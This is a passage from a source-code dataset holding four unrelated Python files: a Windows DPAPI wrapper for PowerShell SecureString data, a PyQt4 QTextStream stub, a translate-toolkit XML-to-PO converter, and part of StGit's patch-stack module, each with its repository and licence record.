# decrypting powershell input:
psenc = "<your output of ConvertFrom-SecureString>"
try:
dec = decrypt(psenc)
print("Decryption from ConvertFrom-SecureString's input: %s" % dec)
except Exception as e:
print(e)
"""
from codecs import encode
from codecs import decode
from blob import Blob
from ctypes import byref
from ctypes import create_string_buffer
from ctypes import windll
protect_data = windll.crypt32.CryptProtectData
unprotect_data = windll.crypt32.CryptUnprotectData
def encrypt(input):
"""Encrypts the given string following the same syscalls as done by
ConvertFrom-SecureString.
Arguments:
input -- an input string.
Returns:
output -- string containing the output of the encryption in hexadecimal.
"""
# CryptProtectData takes UTF-16; so we must convert the data here:
encoded = input.encode("utf-16")
data = create_string_buffer(encoded, len(encoded))
# create our various Blobs:
input_blob = Blob(len(encoded), data)
output_blob = Blob()
flag = 0x01
# call CryptProtectData:
res = protect_data(byref(input_blob), u"", byref(Blob()), None,
None, flag, byref(output_blob))
input_blob.free_blob()
# check return code:
if res == 0:
output_blob.free_blob()
raise Exception("Failed to encrypt: %s" % input)
else:
raw = output_blob.get_data()
output_blob.free_blob()
# encode the resulting bytes into hexadecimal before returning:
hex = encode(raw, "hex")
return decode(hex, "utf-8").upper()
def decrypt(input):
"""Decrypts the given hexadecimally-encoded string in conformity
with CryptUnprotectData.
Arguments:
input -- the encrypted input string in hexadecimal format.
Returns:
output -- string containing the output of decryption.
"""
# de-hex the input:
rawinput = decode(input, "hex")
data = create_string_buffer(rawinput, len(rawinput))
# create out various Blobs:
input_blob = Blob(len(rawinput), data)
output_blob = Blob()
dwflags = 0x01
# call CryptUnprotectData:
res = unprotect_data(byref(input_blob), u"", byref(Blob()), None,
None, dwflags, byref(output_blob))
input_blob.free_blob()
# check return code:
if res == 0:
output_blob.free_blob()
raise Exception("Failed to decrypt: %s" + input)
else:
raw = output_blob.get_data()
output_blob.free_blob()
# decode the resulting data from UTF-16:
return decode(raw, "utf-16")
|
aznashwan/py-securestring
|
securestring.py
|
Python
|
gpl-2.0
| 3,385
|
# encoding: utf-8
# module PyQt4.QtCore
# from /usr/lib/python3/dist-packages/PyQt4/QtCore.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc
# imports
import sip as __sip
class QTextStream(): # skipped bases: <class 'sip.simplewrapper'>
"""
QTextStream()
QTextStream(QIODevice)
QTextStream(QByteArray, QIODevice.OpenMode mode=QIODevice.ReadWrite)
"""
def atEnd(self): # real signature unknown; restored from __doc__
""" QTextStream.atEnd() -> bool """
return False
def autoDetectUnicode(self): # real signature unknown; restored from __doc__
""" QTextStream.autoDetectUnicode() -> bool """
return False
def codec(self): # real signature unknown; restored from __doc__
""" QTextStream.codec() -> QTextCodec """
return QTextCodec
def device(self): # real signature unknown; restored from __doc__
""" QTextStream.device() -> QIODevice """
return QIODevice
def fieldAlignment(self): # real signature unknown; restored from __doc__
""" QTextStream.fieldAlignment() -> QTextStream.FieldAlignment """
pass
def fieldWidth(self): # real signature unknown; restored from __doc__
""" QTextStream.fieldWidth() -> int """
return 0
def flush(self): # real signature unknown; restored from __doc__
""" QTextStream.flush() """
pass
def generateByteOrderMark(self): # real signature unknown; restored from __doc__
""" QTextStream.generateByteOrderMark() -> bool """
return False
def integerBase(self): # real signature unknown; restored from __doc__
""" QTextStream.integerBase() -> int """
return 0
def locale(self): # real signature unknown; restored from __doc__
""" QTextStream.locale() -> QLocale """
return QLocale
def numberFlags(self): # real signature unknown; restored from __doc__
""" QTextStream.numberFlags() -> QTextStream.NumberFlags """
pass
def padChar(self): # real signature unknown; restored from __doc__
""" QTextStream.padChar() -> str """
return ""
def pos(self): # real signature unknown; restored from __doc__
""" QTextStream.pos() -> int """
return 0
def read(self, p_int): # real signature unknown; restored from __doc__
""" QTextStream.read(int) -> str """
return ""
def readAll(self): # real signature unknown; restored from __doc__
""" QTextStream.readAll() -> str """
return ""
def readLine(self, int_maxLength=0): # real signature unknown; restored from __doc__
""" QTextStream.readLine(int maxLength=0) -> str """
return ""
def realNumberNotation(self): # real signature unknown; restored from __doc__
""" QTextStream.realNumberNotation() -> QTextStream.RealNumberNotation """
pass
def realNumberPrecision(self): # real signature unknown; restored from __doc__
""" QTextStream.realNumberPrecision() -> int """
return 0
def reset(self): # real signature unknown; restored from __doc__
""" QTextStream.reset() """
pass
def resetStatus(self): # real signature unknown; restored from __doc__
""" QTextStream.resetStatus() """
pass
def seek(self, p_int): # real signature unknown; restored from __doc__
""" QTextStream.seek(int) -> bool """
return False
def setAutoDetectUnicode(self, bool): # real signature unknown; restored from __doc__
""" QTextStream.setAutoDetectUnicode(bool) """
pass
def setCodec(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
"""
QTextStream.setCodec(QTextCodec)
QTextStream.setCodec(str)
"""
pass
def setDevice(self, QIODevice): # real signature unknown; restored from __doc__
""" QTextStream.setDevice(QIODevice) """
pass
def setFieldAlignment(self, QTextStream_FieldAlignment): # real signature unknown; restored from __doc__
""" QTextStream.setFieldAlignment(QTextStream.FieldAlignment) """
pass
def setFieldWidth(self, p_int): # real signature unknown; restored from __doc__
""" QTextStream.setFieldWidth(int) """
pass
def setGenerateByteOrderMark(self, bool): # real signature unknown; restored from __doc__
""" QTextStream.setGenerateByteOrderMark(bool) """
pass
def setIntegerBase(self, p_int): # real signature unknown; restored from __doc__
""" QTextStream.setIntegerBase(int) """
pass
def setLocale(self, QLocale): # real signature unknown; restored from __doc__
""" QTextStream.setLocale(QLocale) """
pass
def setNumberFlags(self, QTextStream_NumberFlags): # real signature unknown; restored from __doc__
""" QTextStream.setNumberFlags(QTextStream.NumberFlags) """
pass
def setPadChar(self, p_str): # real signature unknown; restored from __doc__
""" QTextStream.setPadChar(str) """
pass
def setRealNumberNotation(self, QTextStream_RealNumberNotation): # real signature unknown; restored from __doc__
""" QTextStream.setRealNumberNotation(QTextStream.RealNumberNotation) """
pass
def setRealNumberPrecision(self, p_int): # real signature unknown; restored from __doc__
""" QTextStream.setRealNumberPrecision(int) """
pass
def setStatus(self, QTextStream_Status): # real signature unknown; restored from __doc__
""" QTextStream.setStatus(QTextStream.Status) """
pass
def setString(self, *args, **kwargs): # real signature unknown
pass
def skipWhiteSpace(self): # real signature unknown; restored from __doc__
""" QTextStream.skipWhiteSpace() """
pass
def status(self): # real signature unknown; restored from __doc__
""" QTextStream.status() -> QTextStream.Status """
pass
def string(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
pass
def __lshift__(self, *args, **kwargs): # real signature unknown
""" Return self<<value. """
pass
def __rlshift__(self, *args, **kwargs): # real signature unknown
""" Return value<<self. """
pass
def __rrshift__(self, *args, **kwargs): # real signature unknown
""" Return value>>self. """
pass
def __rshift__(self, *args, **kwargs): # real signature unknown
""" Return self>>value. """
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
AlignAccountingStyle = 3
AlignCenter = 2
AlignLeft = 0
AlignRight = 1
FieldAlignment = None # (!) real value is ''
FixedNotation = 1
ForcePoint = 2
ForceSign = 4
NumberFlag = None # (!) real value is ''
NumberFlags = None # (!) real value is ''
Ok = 0
ReadCorruptData = 2
ReadPastEnd = 1
RealNumberNotation = None # (!) real value is ''
ScientificNotation = 2
ShowBase = 1
SmartNotation = 0
Status = None # (!) real value is ''
UppercaseBase = 8
UppercaseDigits = 16
WriteFailed = 3
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247971765/PyQt4/QtCore/QTextStream.py
|
Python
|
gpl-2.0
| 7,395
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 BhaaL
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""Convert flat XML files to Gettext PO localization files.
See: http://docs.translatehouse.org/projects/translate-toolkit/en/latest/commands/flatxml2po.html
for examples and usage instructions.
"""
from translate.convert import convert
from translate.storage import flatxml, po
class flatxml2po:
"""Convert a single XML file to a single PO file."""
SourceStoreClass = flatxml.FlatXMLFile
TargetStoreClass = po.pofile
TargetUnitClass = po.pounit
def __init__(self, inputfile, outputfile, templatefile=None,
root="root", value="str", key="key", ns=None):
"""Initialize the converter."""
self.inputfile = inputfile
self.outputfile = outputfile
self.source_store = self.SourceStoreClass(inputfile,
root_name=root,
value_name=value,
key_name=key,
namespace=ns)
self.target_store = self.TargetStoreClass()
def convert_unit(self, unit):
"""Convert a source format unit to a target format unit."""
target_unit = self.TargetUnitClass.buildfromunit(unit)
return target_unit
def convert_store(self):
"""Convert a single source file to a target format file."""
for source_unit in self.source_store.units:
self.target_store.addunit(self.convert_unit(source_unit))
def run(self):
"""Run the converter."""
self.convert_store()
if self.target_store.isempty():
return 0
self.target_store.serialize(self.outputfile)
return 1
def run_converter(inputfile, outputfile, templatefile=None,
root="root", value="str", key="key", ns=None):
"""Wrapper around the converter."""
return flatxml2po(inputfile, outputfile, templatefile,
root, value, key, ns).run()
formats = {
"xml": ("po", run_converter),
}
def main(argv=None):
parser = convert.ConvertOptionParser(formats,
description=__doc__)
parser.add_option("-r", "--root", action="store", dest="root",
default="root",
help='name of the XML root element (default: "root")')
parser.add_option("-v", "--value", action="store", dest="value",
default="str",
help='name of the XML value element (default: "str")')
parser.add_option("-k", "--key", action="store", dest="key",
default="key",
help='name of the XML key attribute (default: "key")')
parser.add_option("-n", "--namespace", action="store", dest="ns",
default=None,
help="XML namespace uri (default: None)")
parser.passthrough.append("root")
parser.passthrough.append("value")
parser.passthrough.append("key")
parser.passthrough.append("ns")
parser.run(argv)
if __name__ == "__main__":
main()
|
unho/translate
|
translate/convert/flatxml2po.py
|
Python
|
gpl-2.0
| 3,817
|
"""Basic quilt-like functionality
"""
__copyright__ = """
Copyright (C) 2005, Catalin Marinas <catalin.marinas@gmail.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as
published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
import sys, os, re
from email.Utils import formatdate
from stgit.exception import *
from stgit.utils import *
from stgit.out import *
from stgit.run import *
from stgit import git, basedir, templates
from stgit.config import config
from shutil import copyfile
from stgit.lib import git as libgit, stackupgrade
# stack exception class
class StackException(StgException):
pass
class FilterUntil:
def __init__(self):
self.should_print = True
def __call__(self, x, until_test, prefix):
if until_test(x):
self.should_print = False
if self.should_print:
return x[0:len(prefix)] != prefix
return False
#
# Functions
#
__comment_prefix = 'STG:'
__patch_prefix = 'STG_PATCH:'
def __clean_comments(f):
"""Removes lines marked for status in a commit file
"""
f.seek(0)
# remove status-prefixed lines
lines = f.readlines()
patch_filter = FilterUntil()
until_test = lambda t: t == (__patch_prefix + '\n')
lines = [l for l in lines if patch_filter(l, until_test, __comment_prefix)]
# remove empty lines at the end
while len(lines) != 0 and lines[-1] == '\n':
del lines[-1]
f.seek(0); f.truncate()
f.writelines(lines)
# TODO: move this out of the stgit.stack module, it is really for
# higher level commands to handle the user interaction
def edit_file(series, line, comment, show_patch = True):
fname = '.stgitmsg.txt'
tmpl = templates.get_template('patchdescr.tmpl')
f = file(fname, 'w+')
if line:
print >> f, line
elif tmpl:
print >> f, tmpl,
else:
print >> f
print >> f, __comment_prefix, comment
print >> f, __comment_prefix, \
'Lines prefixed with "%s" will be automatically removed.' \
% __comment_prefix
print >> f, __comment_prefix, \
'Trailing empty lines will be automatically removed.'
if show_patch:
print >> f, __patch_prefix
# series.get_patch(series.get_current()).get_top()
diff_str = git.diff(rev1 = series.get_patch(series.get_current()).get_bottom())
f.write(diff_str)
#Vim modeline must be near the end.
print >> f, __comment_prefix, 'vi: set textwidth=75 filetype=diff nobackup:'
f.close()
call_editor(fname)
f = file(fname, 'r+')
__clean_comments(f)
f.seek(0)
result = f.read()
f.close()
os.remove(fname)
return result
#
# Classes
#
class StgitObject:
"""An object with stgit-like properties stored as files in a directory
"""
def _set_dir(self, dir):
self.__dir = dir
def _dir(self):
return self.__dir
def create_empty_field(self, name):
create_empty_file(os.path.join(self.__dir, name))
def _get_field(self, name, multiline = False):
id_file = os.path.join(self.__dir, name)
if os.path.isfile(id_file):
line = read_string(id_file, multiline)
if line == '':
return None
else:
return line
else:
return None
def _set_field(self, name, value, multiline = False):
fname = os.path.join(self.__dir, name)
if value and value != '':
write_string(fname, value, multiline)
elif os.path.isfile(fname):
os.remove(fname)
class Patch(StgitObject):
"""Basic patch implementation
"""
def __init_refs(self):
self.__top_ref = self.__refs_base + '/' + self.__name
self.__log_ref = self.__top_ref + '.log'
def __init__(self, name, series_dir, refs_base):
self.__series_dir = series_dir
self.__name = name
self._set_dir(os.path.join(self.__series_dir, self.__name))
self.__refs_base = refs_base
self.__init_refs()
def create(self):
os.mkdir(self._dir())
def delete(self, keep_log = False):
if os.path.isdir(self._dir()):
for f in os.listdir(self._dir()):
os.remove(os.path.join(self._dir(), f))
os.rmdir(self._dir())
else:
out.warn('Patch directory "%s" does not exist' % self._dir())
try:
# the reference might not exist if the repository was corrupted
git.delete_ref(self.__top_ref)
except git.GitException, e:
out.warn(str(e))
if not keep_log and git.ref_exists(self.__log_ref):
git.delete_ref(self.__log_ref)
def get_name(self):
return self.__name
def rename(self, newname):
olddir = self._dir()
old_top_ref = self.__top_ref
old_log_ref = self.__log_ref
self.__name = newname
self._set_dir(os.path.join(self.__series_dir, self.__name))
self.__init_refs()
git.rename_ref(old_top_ref, self.__top_ref)
if git.ref_exists(old_log_ref):
git.rename_ref(old_log_ref, self.__log_ref)
os.rename(olddir, self._dir())
def __update_top_ref(self, ref):
git.set_ref(self.__top_ref, ref)
self._set_field('top', ref)
self._set_field('bottom', git.get_commit(ref).get_parent())
def __update_log_ref(self, ref):
git.set_ref(self.__log_ref, ref)
def get_old_bottom(self):
return git.get_commit(self.get_old_top()).get_parent()
def get_bottom(self):
return git.get_commit(self.get_top()).get_parent()
def get_old_top(self):
return self._get_field('top.old')
def get_top(self):
return git.rev_parse(self.__top_ref)
def set_top(self, value, backup = False):
if backup:
curr_top = self.get_top()
self._set_field('top.old', curr_top)
self._set_field('bottom.old', git.get_commit(curr_top).get_parent())
self.__update_top_ref(value)
def restore_old_boundaries(self):
top = self._get_field('top.old')
if top:
self.__update_top_ref(top)
return True
else:
return False
def get_description(self):
return self._get_field('description', True)
def set_description(self, line):
self._set_field('description', line, True)
def get_authname(self):
return self._get_field('authname')
def set_authname(self, name):
self._set_field('authname', name or git.author().name)
def get_authemail(self):
return self._get_field('authemail')
def set_authemail(self, email):
self._set_field('authemail', email or git.author().email)
def get_authdate(self):
date = self._get_field('authdate')
if not date:
return date
if re.match('[0-9]+\s+[+-][0-9]+', date):
# Unix time (seconds) + time zone
secs_tz = date.split()
date = formatdate(int(secs_tz[0]))[:-5] + secs_tz[1]
return date
def set_authdate(self, date):
self._set_field('authdate', date or git.author().date)
def get_commname(self):
return self._get_field('commname')
def set_commname(self, name):
self._set_field('commname', name or git.committer().name)
def get_commemail(self):
return self._get_field('commemail')
def set_commemail(self, email):
self._set_field('commemail', email or git.committer().email)
def get_log(self):
return self._get_field('log')
def set_log(self, value, backup = False):
self._set_field('log', value)
self.__update_log_ref(value)
class PatchSet(StgitObject):
def __init__(self, name = None):
try:
if name:
self.set_name (name)
else:
self.set_name (git.get_head_file())
self.__base_dir = basedir.get()
except git.GitException, ex:
raise StackException, 'GIT tree not initialised: %s' % ex
self._set_dir(os.path.join(self.__base_dir, 'patches', self.get_name()))
def get_name(self):
return self.__name
def set_name(self, name):
self.__name = name
def _basedir(self):
return self.__base_dir
def get_head(self):
"""Return the head of the branch
"""
crt = self.get_current_patch()
if crt:
return crt.get_top()
else:
return self.get_base()
def get_protected(self):
return os.path.isfile(os.path.join(self._dir(), 'protected'))
def protect(self):
protect_file = os.path.join(self._dir(), 'protected')
if not os.path.isfile(protect_file):
create_empty_file(protect_file)
def unprotect(self):
protect_file = os.path.join(self._dir(), 'protected')
if os.path.isfile(protect_file):
os.remove(protect_file)
def __branch_descr(self):
return 'branch.%s.description' % self.get_name()
def get_description(self):
return config.get(self.__branch_descr()) or ''
def set_description(self, line):
if line:
config.set(self.__branch_descr(), line)
else:
config.unset(self.__branch_descr())
def head_top_equal(self):
"""Return true if the head and the top are the same
"""
crt = self.get_current_patch()
if not crt:
# we don't care, no patches applied
return True
return git.get_head() == crt.get_top()
def is_initialised(self):
"""Checks if series is already initialised
"""
return config.get(stackupgrade.format_version_key(self.get_name())
) != None
def shortlog(patches):
log = ''.join(Run('git', 'log', '--pretty=short',
p.get_top(), '^%s' % p.get_bottom()).raw_output()
for p in patches)
return Run('git', 'shortlog').raw_input(log).raw_output()
class Series(PatchSet):
"""Class including the operations on series
"""
def __init__(self, name = None):
"""Takes a series name as the parameter.
"""
PatchSet.__init__(self, name)
# Update the branch to the latest format version if it is
# initialized, but don't touch it if it isn't.
stackupgrade.update_to_current_format_version(
libgit.Repository.default(), self.get_name())
self.__refs_base = 'refs/patches/%s' % self.get_name()
self.__applied_file = os.path.join(self._dir(), 'applied')
self.__unapplied_file = os.path.join(self._dir(), 'unapplied')
self.__hidden_file = os.path.join(self._dir(), 'hidden')
# where this series keeps its patches
self.__patch_dir = os.path.join(self._dir(), 'patches')
# trash directory
self.__trash_dir = os.path.join(self._dir(), 'trash')
def __patch_name_valid(self, name):
"""Raise an exception if the patch name is not valid.
"""
if not name or re.search('[^\w.-]', name):
raise StackException, 'Invalid patch name: "%s"' % name
def get_patch(self, name):
"""Return a Patch object for the given name
"""
return Patch(name, self.__patch_dir, self.__refs_base)
def get_current_patch(self):
"""Return a Patch object representing the topmost patch, or
None if there is no such patch."""
crt = self.get_current()
if not crt:
return None
return self.get_patch(crt)
def get_current(self):
"""Return the name of the topmost patch, or None if there is
no such patch."""
try:
applied = self.get_applied()
except StackException:
# No "applied" file: branch is not initialized.
return None
try:
return applied[-1]
except IndexError:
# No patches applied.
return None
def get_applied(self):
if not os.path.isfile(self.__applied_file):
raise StackException, 'Branch "%s" not initialised' % self.get_name()
return read_strings(self.__applied_file)
def set_applied(self, applied):
write_strings(self.__applied_file, applied)
def get_unapplied(self):
if not os.path.isfile(self.__unapplied_file):
raise StackException, 'Branch "%s" not initialised' % self.get_name()
return read_strings(self.__unapplied_file)
def set_unapplied(self, unapplied):
write_strings(self.__unapplied_file, unapplied)
def get_hidden(self):
if not os.path.isfile(self.__hidden_file):
return []
return read_strings(self.__hidden_file)
def get_base(self):
# Return the parent of the bottommost patch, if there is one.
if os.path.isfile(self.__applied_file):
bottommost = file(self.__applied_file).readline().strip()
if bottommost:
return self.get_patch(bottommost).get_bottom()
# No bottommost patch, so just return HEAD
return git.get_head()
def get_parent_remote(self):
value = config.get('branch.%s.remote' % self.get_name())
if value:
return value
elif 'origin' in git.remotes_list():
out.note(('No parent remote declared for stack "%s",'
' defaulting to "origin".' % self.get_name()),
('Consider setting "branch.%s.remote" and'
' "branch.%s.merge" with "git config".'
% (self.get_name(), self.get_name())))
return 'origin'
else:
raise StackException, 'Cannot find a parent remote for "%s"' % self.get_name()
def __set_parent_remote(self, remote):
value = config.set('branch.%s.remote' % self.get_name(), remote)
def get_parent_branch(self):
value = config.get('branch.%s.stgit.parentbranch' % self.get_name())
if value:
return value
elif git.rev_parse('heads/origin'):
out.note(('No parent branch declared for stack "%s",'
' defaulting to "heads/origin".' % self.get_name()),
('Consider setting "branch.%s.stgit.parentbranch"'
' with "git config".' % self.get_name()))
return 'heads/origin'
else:
raise StackException, 'Cannot find a parent branch for "%s"' % self.get_name()
def __set_parent_branch(self, name):
if config.get('branch.%s.remote' % self.get_name()):
# Never set merge if remote is not set to avoid
# possibly-erroneous lookups into 'origin'
config.set('branch.%s.merge' % self.get_name(), name)
config.set('branch.%s.stgit.parentbranch' % self.get_name(), name)
def set_parent(self, remote, localbranch):
if localbranch:
if remote:
self.__set_parent_remote(remote)
self.__set_parent_branch(localbranch)
# We'll enforce this later
# else:
# raise StackException, 'Parent branch (%s) should be specified for %s' % localbranch, self.get_name()
def __patch_is_current(self, patch):
return patch.get_name() == self.get_current()
def patch_applied(self, name):
"""Return true if the patch exists in the applied list
"""
return name in self.get_applied()
def patch_unapplied(self, name):
"""Return true if the patch exists in the unapplied list
"""
return name in self.get_unapplied()
def patch_hidden(self, name):
"""Return true if the patch is hidden.
"""
return name in self.get_hidden()
def patch_exists(self, name):
"""Return true if there is a patch with the given name, false
otherwise."""
return self.patch_applied(name) or self.patch_unapplied(name) \
or self.patch_hidden(name)
def init(self, create_at=False, parent_remote=None, parent_branch=None):
"""Initialises the stgit series
"""
if self.is_initialised():
raise StackException, '%s already initialized' % self.get_name()
for d in [self._dir()]:
if os.path.exists(d):
raise StackException, '%s already exists' % d
if (create_at!=False):
git.create_branch(self.get_name(), create_at)
os.makedirs(self.__patch_dir)
self.set_parent(parent_remote, parent_branch)
self.create_empty_field('applied')
self.create_empty_field('unapplied')
config.set(stackupgrade.format_version_key(self.get_name()),
str(stackupgrade.FORMAT_VERSION))
def rename(self, to_name):
"""Renames a series
"""
to_stack = Series(to_name)
if to_stack.is_initialised():
raise StackException, '"%s" already exists' % to_stack.get_name()
patches = self.get_applied() + self.get_unapplied()
git.rename_branch(self.get_name(), to_name)
for patch in patches:
git.rename_ref('refs/patches/%s/%s' % (self.get_name(), patch),
'refs/patches/%s/%s' % (to_name, patch))
git.rename_ref('refs/patches/%s/%s.log' % (self.get_name(), patch),
'refs/patches/%s/%s.log' % (to_name, patch))
if os.path.isdir(self._dir()):
rename(os.path.join(self._basedir(), 'patches'),
self.get_name(), to_stack.get_name())
# Rename the config section
for k in ['branch.%s', 'branch.%s.stgit']:
config.rename_section(k % self.get_name(), k % to_name)
self.__init__(to_name)
def clone(self, target_series):
"""Clones a series
"""
try:
# allow cloning of branches not under StGIT control
base = self.get_base()
except:
base = git.get_head()
Series(target_series).init(create_at = base)
new_series = Series(target_series)
# generate an artificial description file
new_series.set_description('clone of "%s"' % self.get_name())
# clone self's entire series as unapplied patches
try:
# allow cloning of branches not under StGIT control
applied = self.get_applied()
unapplied = self.get_unapplied()
patches = applied + unapplied
patches.reverse()
except:
patches = applied = unapplied = []
for p in patches:
patch = self.get_patch(p)
newpatch = new_series.new_patch(p, message = patch.get_description(),
can_edit = False, unapplied = True,
bottom = patch.get_bottom(),
top = patch.get_top(),
author_name = patch.get_authname(),
author_email = patch.get_authemail(),
author_date = patch.get_authdate())
if patch.get_log():
out.info('Setting log to %s' % patch.get_log())
newpatch.set_log(patch.get_log())
else:
out.info('No log for %s' % p)
# fast forward the cloned series to self's top
new_series.forward_patches(applied)
# Clone parent informations
value = config.get('branch.%s.remote' % self.get_name())
if value:
config.set('branch.%s.remote' % target_series, value)
value = config.get('branch.%s.merge' % self.get_name())
if value:
config.set('branch.%s.merge' % target_series, value)
value = config.get('branch.%s.stgit.parentbranch' % self.get_name())
if value:
config.set('branch.%s.stgit.parentbranch' % target_series, value)
def delete(self, force = False):
"""Deletes an stgit series
"""
if self.is_initialised():
patches = self.get_unapplied() + self.get_applied() + \
self.get_hidden();
if not force and patches:
raise StackException, \
'Cannot delete: the series still contains patches'
for p in patches:
self.get_patch(p).delete()
# remove the trash directory if any
if os.path.exists(self.__trash_dir):
for fname in os.listdir(self.__trash_dir):
os.remove(os.path.join(self.__trash_dir, fname))
os.rmdir(self.__trash_dir)
# FIXME: find a way to get rid of those manual removals
# (move functionality to StgitObject ?)
if os.path.exists(self.__applied_file):
os.remove(self.__applied_file)
if os.path.exists(self.__unapplied_file):
os.remove(self.__unapplied_file)
if os.path.exists(self.__hidden_file):
os.remove(self.__hidden_file)
if os.path.exists(self._dir()+'/orig-base'):
os.remove(self._dir()+'/orig-base')
if not os.listdir(self.__patch_dir):
os.rmdir(self.__patch_dir)
else:
out.warn('Patch directory %s is not empty' % self.__patch_dir)
try:
os.removedirs(self._dir())
except OSError:
raise StackException('Series directory %s is not empty'
% self._dir())
try:
git.delete_branch(self.get_name())
except git.GitException:
out.warn('Could not delete branch "%s"' % self.get_name())
config.remove_section('branch.%s' % self.get_name())
config.remove_section('branch.%s.stgit' % self.get_name())
def refresh_patch(self, files = None, message = None, edit = False,
empty = False,
show_patch = False,
cache_update = True,
author_name = None, author_email = None,
author_date = None,
committer_name = None, committer_email = None,
backup = True, sign_str = None, log = 'refresh',
notes = None, bottom = None):
"""Generates a new commit for the topmost patch
"""
patch = self.get_current_patch()
if not patch:
raise StackException, 'No patches applied'
descr = patch.get_description()
if not (message or descr):
edit = True
descr = ''
elif message:
descr = message
# TODO: move this out of the stgit.stack module, it is really
# for higher level commands to handle the user interaction
if not message and edit:
descr = edit_file(self, descr.rstrip(), \
'Please edit the description for patch "%s" ' \
'above.' % patch.get_name(), show_patch)
if not author_name:
author_name = patch.get_authname()
if not author_email:
author_email = patch.get_authemail()
if not committer_name:
committer_name = patch.get_commname()
if not committer_email:
committer_email = patch.get_commemail()
descr = add_sign_line(descr, sign_str, committer_name, committer_email)
if not bottom:
bottom = patch.get_bottom()
if empty:
tree_id = git.get_commit(bottom).get_tree()
else:
tree_id = None
commit_id = git.commit(files = files,
message = descr, parents = [bottom],
cache_update = cache_update,
tree_id = tree_id,
set_head = True,
allowempty = True,
author_name = author_name,
author_email = author_email,
author_date = author_date,
committer_name = committer_name,
committer_email = committer_email)
patch.set_top(commit_id, backup = backup)
patch.set_description(descr)
patch.set_authname(author_name)
patch.set_authemail(author_email)
patch.set_authdate(author_date)
patch.set_commname(committer_name)
patch.set_commemail(committer_email)
if log:
self.log_patch(patch, log, notes)
return commit_id
def new_patch(self, name, message = None, can_edit = True,
unapplied = False, show_patch = False,
top = None, bottom = None, commit = True,
author_name = None, author_email = None, author_date = None,
committer_name = None, committer_email = None,
before_existing = False, sign_str = None):
"""Creates a new patch, either pointing to an existing commit object,
or by creating a new commit object.
"""
assert commit or (top and bottom)
assert not before_existing or (top and bottom)
assert not (commit and before_existing)
assert (top and bottom) or (not top and not bottom)
assert commit or (not top or (bottom == git.get_commit(top).get_parent()))
if name != None:
self.__patch_name_valid(name)
if self.patch_exists(name):
raise StackException, 'Patch "%s" already exists' % name
# TODO: move this out of the stgit.stack module, it is really
# for higher level commands to handle the user interaction
def sign(msg):
return add_sign_line(msg, sign_str,
committer_name or git.committer().name,
committer_email or git.committer().email)
if not message and can_edit:
descr = edit_file(
self, sign(''),
'Please enter the description for the patch above.',
show_patch)
else:
descr = sign(message)
head = git.get_head()
if name == None:
name = make_patch_name(descr, self.patch_exists)
patch = self.get_patch(name)
patch.create()
patch.set_description(descr)
patch.set_authname(author_name)
patch.set_authemail(author_email)
patch.set_authdate(author_date)
patch.set_commname(committer_name)
patch.set_commemail(committer_email)
if before_existing:
insert_string(self.__applied_file, patch.get_name())
elif unapplied:
patches = [patch.get_name()] + self.get_unapplied()
write_strings(self.__unapplied_file, patches)
set_head = False
else:
append_string(self.__applied_file, patch.get_name())
set_head = True
if commit:
if top:
top_commit = git.get_commit(top)
else:
bottom = head
top_commit = git.get_commit(head)
# create a commit for the patch (may be empty if top == bottom);
# only commit on top of the current branch
assert(unapplied or bottom == head)
commit_id = git.commit(message = descr, parents = [bottom],
cache_update = False,
tree_id = top_commit.get_tree(),
allowempty = True, set_head = set_head,
author_name = author_name,
author_email = author_email,
author_date = author_date,
committer_name = committer_name,
committer_email = committer_email)
# set the patch top to the new commit
patch.set_top(commit_id)
else:
patch.set_top(top)
self.log_patch(patch, 'new')
return patch
def delete_patch(self, name, keep_log = False):
"""Deletes a patch
"""
self.__patch_name_valid(name)
patch = self.get_patch(name)
if self.__patch_is_current(patch):
self.pop_patch(name)
elif self.patch_applied(name):
raise StackException, 'Cannot remove an applied patch, "%s", ' \
'which is not current' % name
elif not name in self.get_unapplied():
raise StackException, 'Unknown patch "%s"' % name
# save the commit id to a trash file
write_string(os.path.join(self.__trash_dir, name), patch.get_top())
patch.delete(keep_log = keep_log)
unapplied = self.get_unapplied()
unapplied.remove(name)
write_strings(self.__unapplied_file, unapplied)
def forward_patches(self, names):
"""Try to fast-forward an array of patches.
On return, patches in names[0:returned_value] have been pushed on the
stack. Apply the rest with push_patch
"""
unapplied = self.get_unapplied()
forwarded = 0
top = git.get_head()
for name in names:
assert(name in unapplied)
patch = self.get_patch(name)
head = top
bottom = patch.get_bottom()
top = patch.get_top()
# top != bottom always since we have a commit for each patch
if head == bottom:
# reset the backup information. No logging since the
# patch hasn't changed
patch.set_top(top, backup = True)
else:
head_tree = git.get_commit(head).get_tree()
bottom_tree = git.get_commit(bottom).get_tree()
if head_tree == bottom_tree:
# We must just reparent this patch and create a new commit
# for it
descr = patch.get_description()
author_name = patch.get_authname()
author_email = patch.get_authemail()
author_date = patch.get_authdate()
committer_name = patch.get_commname()
committer_email = patch.get_commemail()
top_tree = git.get_commit(top).get_tree()
top = git.commit(message = descr, parents = [head],
cache_update = False,
tree_id = top_tree,
allowempty = True,
author_name = author_name,
author_email = author_email,
author_date = author_date,
committer_name = committer_name,
committer_email = committer_email)
patch.set_top(top, backup = True)
self.log_patch(patch, 'push(f)')
else:
top = head
# stop the fast-forwarding, must do a real merge
break
forwarded+=1
unapplied.remove(name)
if forwarded == 0:
return 0
